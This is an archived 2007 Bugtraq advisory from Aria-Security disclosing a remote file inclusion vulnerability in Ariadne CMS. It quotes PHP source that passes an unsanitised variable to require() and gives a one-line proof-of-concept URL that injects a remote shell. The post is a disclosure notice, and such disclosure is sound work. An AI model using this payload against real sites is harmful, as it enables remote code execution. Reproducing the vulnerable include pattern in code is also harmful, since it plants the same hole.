lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070806214132.7436.qmail@securityfocus.com> Date: 6 Aug 2007 21:41:32 -0000 From: Advisory@...a-security.net To: bugtraq@...urityfocus.com Subject: Ariadne CMS Remote File Inclusion _________________________ A R I A - S E C U R I T Y _________________________ Ariadne CMS Remote File Inclusion Vendor: http://www.ariadne-cms.org/ Source Code: <?php require("./ariadne.inc"); require($ariadne."/configs/ariadne.phtml"); $PATH_INFO = $HTTP_SERVER_VARS["PATH_INFO"]; ?> <html> <head> <script> function LoadingDone() { parent.LoadingDone(); } PoC: http://site.com/path/view.php?ariadne=SHELL? Credits: Aria-Security Team http://Aria-Security.net http://outlaw.aria-security.info